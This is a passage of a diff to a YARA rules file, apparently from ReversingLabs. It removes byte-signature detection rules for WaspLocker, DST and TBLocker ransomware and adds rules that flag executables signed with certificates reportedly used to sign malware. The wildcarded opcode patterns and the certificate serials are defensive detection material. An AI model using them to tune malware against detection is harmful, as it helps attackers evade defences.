+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12274-L12292"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "eb5288d2b96ff7a7783c2b2b02f9f1168784352ed84ad6463dce00c12daca6cb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WaspLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            50 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0
-            75 ?? 57 53 E8 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            A8 ?? 75 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 3B 85 ?? ?? ?? ?? 76 ?? 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 59 03 C2 B9 ?? ?? ?? ?? 3B C1
-            7D ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? EB ?? 85 DB 0F 84
-            ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 85 FF 75 ?? 33 C0 EB ?? 57 E8 ?? ?? ?? ?? 59 50 57
-            8D 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 40 E8 ?? ?? ??
-            ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
-            F6 89 75 ?? 33 FF 89 7D ?? 21 75 ?? 21 75 ?? 39 3D ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8
-            ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B F0 89 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2
-        }
-		$drop_aux_files = {
-            A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 66 89 41 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 56 6A ?? FF 15 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF 15
-            ?? ?? ?? ?? 8B F8 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
-            F0 83 C4 ?? 85 F6 74 ?? 56 FF B5 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56
-            E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 6A ?? 56 FF 15 ?? ??
-            ?? ?? 50 89 85 ?? ?? ?? ?? E8
-        }
-		$drop_ransom_notes = {
-            89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0
-            75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? B9 ?? ?? ?? ?? 8D
-            51 ?? 90 8A 01 41 84 C0 75 ?? 2B CA 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83
-            C0 ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            84 C0 75
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $drop_aux_files ) and ( $drop_ransom_notes )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANKADA GROUP, d.o.o." and ( pe.signatures [ i ] . serial == "00:bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09" or pe.signatures [ i ] . serial == "bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09" ) and 1616630400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_DST : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4929Ab561C812Af93Ddb9758B545F546 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DST ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bcc9933d-14eb-5f83-a136-5f009c7a3282"
-		date = "2021-12-06"
-		modified = "2021-12-06"
+		id = "6e8ffb39-d00d-54ca-a4be-68f6dd92d798"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.DST.yara#L1-L170"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b658093232a2265d425e3b38758268c116bbac51fa5eed372b5b4f00de4c6880"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12294-L12310"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "12235e324b92b83e9cfaed7cbcff5d093b8b1d7528dd5ac327159cde6e9a4d1f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DST"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
-            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
-            ?? 48 89 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48
-            89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 4C 24 ??
-            31 C9 31 FF E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB
-            0F 85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D ?? ??
-            ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 0F 1F 00
-            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ??
-            ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BF ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85 DB 0F 85
-            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 0D
-        }
-		$encrypt_files_p2 = {
-            48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 44 24 ?? E8 ?? ?? ?? ?? 90 85 C0 0F 85 ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
-            BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
-            ?? 48 85 DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ??
-            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 85 C9 0F 85 ?? ?? ?? ??
-            48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ??
-            ?? ?? FF D2 48 8B 0D ?? ?? ?? ?? 83 B9 ?? ?? ?? ?? ?? 75 ?? 48 89 C2 48 C1 E0 ?? 48
-            8D 70 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 D1 48 F7 EE 48 8D 14 CA 48 8D 52 ?? 48
-        }
-		$encrypt_files_p3 = {
-            C1 FA ?? 48 C1 FE ?? 48 29 F2 EB ?? 48 8D 70 ?? 48 89 C1 48 B8 ?? ?? ?? ?? ?? ?? ??
-            ?? 48 F7 EE 48 8D 14 0A 48 8D 52 ?? 48 D1 FA 48 C1 FE ?? 48 29 F2 48 C1 E2 ?? 48 8D
-            4A ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 CB E8 ?? ?? ?? ?? 48 89 C3 48 8B 4C
-            24 ?? 48 89 CF 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 85 DB 0F 85 ?? ?? ?? ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4C
-            24 ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85
-            DB 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 31 FF 48 8B 74
-            24 ?? 4C 8B 84 24 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 85 DB 0F
-            85 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 C3 48 8D 0D ?? ?? ?? ?? 48 8B BC 24 ??
-            ?? ?? ?? 31 F6 45 31 C0 4D 89 C1 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ??
-            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24
-            ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
-            ?? 31 DB 31 C9 E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 85
-            DB 74 ?? 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC
-            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 94 24 ?? ?? ?? ?? 48 8B 72 ?? 48 8B 42
-            ?? 48 8B 56 ?? 31 DB 31 C9 48 89 CF FF D2 48 8B 15 ?? ?? ?? ?? 48 89 CF 48 89 D9 48
-        }
-		$encrypt_files_p4 = {
-            89 C3 48 89 D0 E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84 24 ?? ?? ?? ?? 0F 1F 40 ??
-            E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48
-            8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ??
-            ?? ?? C3 90 0F 1F 40 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
-            ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ??
-            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90
-            E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ??
-            ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ??
-            ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84
-            24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
-            C3 90 66 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC
-            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
-            8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ??
-            ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4
-            ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48
-            8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
-            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 66 90
-            E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ??
-            ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48 89 7C 24
-            ?? E8
-        }
-		$find_files_p1 = {
-            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
-            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ??
-            ?? 48 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB 7E ?? 48 89 5C 24 ?? 31 C9 EB ??
-            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 8D 43 ??
-            48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 58 ?? 48 89 5C
-            24 ?? 48 8B 72 ?? 48 89 D8 FF D6 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48
-            8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 C0 49 89 D9 31 C0 48
-            8B 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8B 4C 24 ?? 48
-            8B 51 ?? 48 8B 44 24 ?? FF D2 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D
-            4B ?? 66 90 E9 ?? ?? ?? ?? 48 29 CB 48 89 DA 48 F7 DB 48 C1 FB ?? 48 21 D9 48 01 C1
-            48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? EB ?? 31 D2 31 C9 48 89 C8 48 89 D3
-            E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
-            48 8B 3D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 66 90 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D BC
-            24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C
-        }
-		$find_files_p2 = {
-            24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 8D 84 24 ?? ?? ?? ?? 31 C9 0F 1F 00 E9 ?? ?? ??
-            ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 84 C0 74 ?? 48 8B 44 24 ?? 48 8B
-            5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 8B 54 24
-            ?? 0F 1F 00 48 39 CA 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 FF C9 48 85 C9 0F 8C ?? ??
-            ?? ?? 0F B6 14 08 66 90 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA
-            ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 42 ?? 48 89 4C 24 ?? 48 89 84
-            24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 70 ?? 48 89 74 24 ?? 48 8B 5C 24 ?? 48
-            8B 44 24 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 44
-            24 ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ??
-            48 89 DF 48 89 D3 48 89 C2 48 89 C8 48 89 D1 E8 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
-            48 85 C0 0F 8D ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ?? ?? ?? ?? 48
-            8B 4C 24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 84
-            24 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 44 24 ??
-            48 89 5C 24 ?? 48 89 4C 24 ?? 66 90 E8
-        }
-		$kill_procs_p1 = {
-            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
-            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48
-            89 5C 24 ?? 31 C9 66 90 EB ?? 48 8B 54 24 ?? 48 8D 4A ?? 48 8B 84 24 ?? ?? ?? ?? 48
-            8B 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 39 CB 0F 8E ?? ?? ?? ?? 48 89 4C 24 ?? 48 C1
-            E1 ?? 48 8B 1C 08 48 89 5C 24 ?? 48 8B 4C 08 ?? 48 89 4C 24 ?? 48 8B 73 ?? 48 89 C8
-            FF D6 48 89 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48
-            8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 48
-            89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B
-            3D ?? ?? ?? ?? 48 89 C3 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48
-            89 08 48 8D BC 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 48 A5 48 8D BC
-            24 ?? ?? ?? ?? 48 8D 7F ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ??
-            48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            EB ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8D 84 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 48 85 C9 0F 84 ?? ?? ??
-            ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 12 48 89 54 24 ?? 48 8B 01 48 89 44 24 ?? 48 8B 59
-            ?? 48 89 5C 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 31 F6 EB ?? 48 8B 94 24 ?? ?? ?? ?? 48 83
-        }
-		$kill_procs_p2 = {
-            C2 ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 89 CE 48 89 D1 48 89 74 24 ?? 48 89 8C 24 ??
-            ?? ?? ?? 48 8B 11 48 89 54 24 ?? 48 8B 79 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C
-            24 ?? 48 8B 7C 24 ?? 90 E8 ?? ?? ?? ?? 48 85 C0 0F 8C ?? ?? ?? ?? 48 8B 44 24 ?? BB
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 DE 31 C0 48 8D 1D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 44 0F 11 39 48 8D 94 24 ?? ?? ?? ?? 44 0F
-            11 3A 48 8D 15 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ??
-            ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 44 0F 11 BC 24 ?? ?? ?? ??
-            48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 1D ?? ??
-            ?? ?? BF ?? ?? ?? ?? 48 89 FE 48 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 8B 44 24 ?? 90 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Everything Wow s.r.o." and pe.signatures [ i ] . serial == "49:29:ab:56:1c:81:2a:f9:3d:db:97:58:b5:45:f5:46" and 1594252800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_25C6Dbce3D5499F65D9Df16E9007465D : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "f6d0808d-4748-5b9f-9be2-7753292a6209"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12312-L12328"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "978f05f86734c63afe1e5929a58f3cfff75ef749ffda07252db90b6fe12508ec"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $kill_procs_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "25:c6:db:ce:3d:54:99:f6:5d:9d:f1:6e:90:07:46:5d" and 1626566400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Tblocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Bc6A1812E001362469541108973Bbd52 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TBLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "91793018-baf6-5e70-83b6-8793482c3bec"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "ac5ac6d7-898b-5547-8d35-a483f20edcd6"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.TBLocker.yara#L1-L85"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "81f0077655ac0e59cd8dc05be602ae500c938668bd57d3cf4a51fbff2a5b6b83"
